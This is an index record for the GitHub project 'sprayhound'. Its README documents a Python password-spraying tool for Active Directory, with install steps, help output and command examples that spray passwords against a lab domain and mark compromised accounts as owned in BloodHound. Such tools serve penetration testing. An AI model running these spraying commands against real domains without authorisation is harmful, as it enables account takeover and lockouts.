{"id":18864770,"url":"https://github.com/hackndo/sprayhound","last_synced_at":"2025-04-13T02:10:09.552Z","repository":{"id":41546099,"uuid":"238748349","full_name":"Hackndo/sprayhound","owner":"Hackndo","description":"Password spraying tool and Bloodhound integration","archived":false,"fork":false,"pushed_at":"2024-12-31T08:09:37.000Z","size":104,"stargazers_count":229,"open_issues_count":2,"forks_count":19,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-04-13T02:09:57.146Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Hackndo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-02-06T17:45:37.000Z","updated_at":"2025-03-21T01:59:43.000Z","dependencies_parsed_at":"2024-11-08T04:44:02.903Z","dependency_job_id":"fbc4188a-dd10-4e08-9527-2138f28476af","html_url":"https://github.com/Hackndo/sprayhound","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2Fsprayhound","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2Fsprayhound/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2Fsprayhound/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2Fsprayhound/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Hackndo","download_url":"https://codeload.github.com/Hackndo/sprayhound/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248654090,"owners_count":21140236,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-08T04:43:59.319Z","updated_at":"2025-04-13T02:10:09.395Z","avatar_url":"https://github.com/Hackndo.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# SprayHound\n\n[![PyPI version](https://d25lcipzij17d.cloudfront.net/badge.svg?id=py\u0026type=6\u0026v=0.0.4\u0026x2=0)](https://pypi.org/project/sprayhound/) [![Twitter](https://img.shields.io/twitter/follow/hackanddo?label=HackAndDo\u0026style=social)](https://twitter.com/intent/follow?screen_name=hackanddo)\n\n\n![Example](https://raw.githubusercontent.com/Hackndo/sprayhound/master/asssets/example.gif)\n\nPython library to safely password spray in Active Directory, set pwned users as owned in Bloodhound and detect path to Domain Admins\n\n\nThis library uses [ldap3](https://ldap3.readthedocs.io) project for all LDAP operations.\n\n| Chapters                                     | Description                                             |\n|----------------------------------------------|---------------------------------------------------------|\n| [Requirements](#requirements)                | Requirements to install sprayhound                      |\n| [Warning](#warning)                          | Before using this tool, read this                       |\n| [Installation](#installation)                | Installation instructions                               |\n| [Usage](#usage)                              | Usage and command lines examples                        |\n\n## Requirements\n\n* Python \u003e= 3.6\n\n## Warning\n\nOnly default domain policy is checked for now. If custom GPO is used for password policy, it won't be detected. That's some work in progress.\n\n\n## Installation\n\n### From pip\n\n```bash\npython3 -m pip install sprayhound\n```\n\n### From source\n\n```bash\nsudo apt-get install libsasl2-dev python3-dev libldap2-dev libssl-dev\ngit clone git@github.com:Hackndo/sprayhound.git\ncd sprayhound\npython3 setup.py install\n```\n\n## Usage\n\n### Parameters\n\n```bash\n$ sprayhound -h\n\nusage: sprayhound [-h] [-u USERNAME] [-U USERFILE]\n                  [-p PASSWORD | --lower | --upper] [-t THRESHOLD]\n                  [-dc DOMAIN_CONTROLLER] [-d DOMAIN] [-lP LDAP_PORT]\n                  [-lu LDAP_USER] [-lp LDAP_PASS] [-lssl]\n                  [-lpage LDAP_PAGE_SIZE] [-nh NEO4J_HOST] [-nP NEO4J_PORT]\n                  [-nu NEO4J_USER] [-np NEO4J_PASS] [--unsafe] [--force]\n                  [--nocolor] [-v]\n\nsprayhound v0.0.1 - Password spraying\n\noptional arguments:\n  -h, --help            show this help message and exit\n  --unsafe              Enable login tries on almost locked out accounts\n  --force               Do not prompt for user confirmation\n  --nocolor             Do not use color for output\n  -v                    Verbosity level (-v or -vv)\n\ncredentials:\n  -u USERNAME, --username USERNAME\n                        Username\n  -U USERFILE, --userfile USERFILE\n                        File containing username list\n  -p PASSWORD, --password PASSWORD\n                        Password\n  --lower               User as pass with lowercase password\n  --upper               User as pass with uppercase password\n  -t THRESHOLD, --threshold THRESHOLD\n                        Number of password left allowed before locked out\n\nldap:\n  -dc DOMAIN_CONTROLLER, --domain-controller DOMAIN_CONTROLLER\n                        Domain controller\n  -d DOMAIN, --domain DOMAIN\n                        Domain FQDN\n  -lP LDAP_PORT, --ldap-port LDAP_PORT\n                        LDAP Port\n  -lu LDAP_USER, --ldap-user LDAP_USER\n                        LDAP User\n  -lp LDAP_PASS, --ldap-pass LDAP_PASS\n                        LDAP Password\n  -lssl, --ldap-ssl     LDAP over TLS (ldaps)\n  -lpage LDAP_PAGE_SIZE, --ldap-page-size LDAP_PAGE_SIZE\n                        LDAP Paging size (Default: 200)\n\nneo4j:\n  -nh NEO4J_HOST, --neo4j-host NEO4J_HOST\n                        Neo4J Host (Default: 127.0.0.1)\n  -nP NEO4J_PORT, --neo4j-port NEO4J_PORT\n                        Neo4J Port (Default: 7687)\n  -nu NEO4J_USER, --neo4j-user NEO4J_USER\n                        Neo4J user (Default: neo4j)\n  -np NEO4J_PASS, --neo4j-pass NEO4J_PASS\n                        Neo4J password (Default: neo4j)\n```\n\n### Unauthenticated\n\nWhen used unauthenticated, **sprayhound** won't be able to check password policies. Account could be locked out.\n\n```bash\n# Single user, single password\nsprayhound -u simba -p Pentest123.. -d hackn.lab -dc 10.10.10.1\n\n# User list, single password\nsprayhound -U ./users.txt -p Pentest123.. -d hackn.lab -dc 10.10.10.1\n\n# User as pass\nsprayhound -U ./users.txt -d hackn.lab -dc 10.10.10.1\n\n# User as pass with password lowercase\nsprayhound -U ./users.txt --lower -d hackn.lab -dc 10.10.10.1\n\n# User as pass with password uppercase\nsprayhound -U ./users.txt --upper -d hackn.lab -dc 10.10.10.1\n```\n\n### Authenticated\n\nWhen providing a valid domain account, **sprayhound** will try and find default domain policy and check **badpwdcount** attribute of each user against lockout threshold. If too close, it will skip these accounts.\n\n```bash\n# Single user, single password\nsprayhound -u simba -p Pentest123.. -d hackn.lab -dc 10.10.10.1 -lu pixis -lp P4ssw0rd\n\n# All domain users, single password\nsprayhound -p Pentest123.. -d hackn.lab -dc 10.10.10.1 -lu pixis -lp P4ssw0rd\n\n# All domain users, single password, using an account from a trusted domain\nsprayhound -p Pentest123.. -d hackn.lab -dc 10.10.10.1 -lu 'babdcatha.net\\Babd' -lp P4ssw0rd\n\n# User as pass on all domain users\nsprayhound -d hackn.lab -dc 10.10.10.1 -lu pixis -lp P4ssw0rd\n\n# User as pass with password lowercase\nsprayhound --lower -d hackn.lab -dc 10.10.10.1 -lu pixis -lp P4ssw0rd\n\n# User as pass with password uppercase\nsprayhound --upper -d hackn.lab -dc 10.10.10.1 -lu pixis -lp P4ssw0rd\n```\n\nDifference between **badpwdcount** and lockout threshold can be tuned using `--threshold` parameter. If set to **2**, and password policy locks out accounts after 5 login failure, then **sprayhound** won't test users with **badpwdcount** 3 (and more).\n\n```bash\nsprayhound -d hackn.lab -dc 10.10.10.1 -lu pixis -lp P4ssw0rd --threshold 1\n```\n\n## Bloodhound integration\n\nWhen **sprayhound** finds accounts credentials, it can set these accounts as **Owned** in BloodHound. BloodHound information should be provided to this tool.\n\n```bash\n# -nh: Neo4J server\n# -nP: Neo4J port\n# -nu: Neo4J user\n# -np: Neo4J password\nsprayhound -d hackn.lab -dc 10.10.10.1 -lu pixis -lp P4ssw0rd -nh 127.0.0.1 -nP 7687 -nu neo4j -np bloodhound\n```\n\n\n## Changelog\n\n```\nv0.0.2\n------\nFirst release\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackndo%2Fsprayhound","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhackndo%2Fsprayhound","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackndo%2Fsprayhound/lists"}